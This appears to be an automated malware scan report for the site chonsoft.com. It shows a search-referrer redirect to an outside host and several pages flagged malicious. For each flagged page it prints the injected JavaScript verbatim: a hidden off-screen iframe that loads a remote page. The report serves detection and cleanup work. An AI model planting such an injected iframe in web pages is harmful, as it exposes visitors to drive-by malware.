Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chonsoft.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://chonsoft.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: chonsoft.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 04 Oct 2014 22:17:25 GMT Location: http://holyw.ddns.me.uk/ Server: nginx/0.9.4 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://chonsoft.com/ | 200 OK Content-Length: 36391 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports:
| ||
http://chonsoft.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/x-javascript | clean |
http://chonsoft.com/wp-content/themes/Captions/lib/js/superfish.js?ver=3.3.1 | 200 OK Content-Length: 3714 Content-Type: application/x-javascript | clean |
http://chonsoft.com/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://chonsoft.com/wp-content/themes/Captions/includes/featuredposts/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 31032 Content-Type: application/x-javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
http://chonsoft.com/wp-includes/js/hoverIntent.js?ver=20090102 | 200 OK Content-Length: 1334 Content-Type: application/x-javascript | clean |
http://chonsoft.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=3.08 | 200 OK Content-Length: 37156 Content-Type: application/x-javascript | clean |
http://chonsoft.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.1.2 | 200 OK Content-Length: 6208 Content-Type: application/x-javascript | clean |
http://chonsoft.com/?page_id=4 | 200 OK Content-Length: 24296 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports:
| ||
http://chonsoft.com/?cat=3 | 200 OK Content-Length: 28532 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports:
| ||
http://chonsoft.com/?post_type=forum | 200 OK Content-Length: 17801 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports:
| ||
http://chonsoft.com/?page_id=19 | 200 OK Content-Length: 18797 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports:
| ||
http://chonsoft.com/wp-content/plugins/clean-contact/fieldset.js | 200 OK Content-Length: 2452 Content-Type: application/x-javascript | clean |
http://chonsoft.com/?p=33 | 200 OK Content-Length: 24400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://www.couchtarts.com/media.php'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dradv\'></div>'); document.getElementById('__dradv').appendChild(_q); Antivirus reports:
|